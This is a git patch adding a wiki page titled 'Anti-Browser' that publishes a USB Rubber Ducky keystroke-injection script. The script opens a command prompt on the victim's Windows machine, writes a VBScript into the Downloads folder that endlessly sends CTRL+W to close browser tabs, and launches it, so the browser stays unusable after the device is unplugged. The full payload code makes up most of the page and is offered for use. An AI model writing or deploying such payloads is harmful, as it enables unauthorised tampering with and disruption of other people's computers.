From f4117f1c0922d80bbafeed2a5572889d4ea86959 Mon Sep 17 00:00:00 2001 From: BlueArduino20 Date: Fri, 23 Jun 2017 22:58:04 +0200 Subject: [PATCH] Created Anti-Browser (markdown) --- Anti-Browser.md | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 Anti-Browser.md diff --git a/Anti-Browser.md b/Anti-Browser.md new file mode 100644 index 0000000..3ed4dad --- /dev/null +++ b/Anti-Browser.md @@ -0,0 +1,40 @@ +# Anti-Browser +This script creates a vbs file that sends CTRL+W over and over very fast and, therefore, it will be impossible to use the browser. Furthermore, you can unplug the Rubber Ducky after the vbs is executed, because the thing that sends the keystrokes is the vbs file and not the Ducky. +

About...

+ +Author: BlueArduino20 + +Original repository: https://github.com/BlueArduino20/Anti-Browser + +Time needed to complete the script injection: about 1.5 seconds! + +Version: 1.0 + +

Code

+ +
ESC
+DELAY 500
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 200
+STRING cd %userprofile%/Downloads
+ENTER
+STRING copy con CW.vbs
+ENTER
+STRING do
+ENTER
+STRING Set objShell = CreateObject("WScript.Shell")
+ENTER
+STRING WScript.Sleep 800
+ENTER
+STRING objShell.SendKeys "^{W}"
+ENTER
+STRING loop
+CTRL z
+DELAY 100
+ENTER
+STRING start CW.vbs && exit
+ENTER
+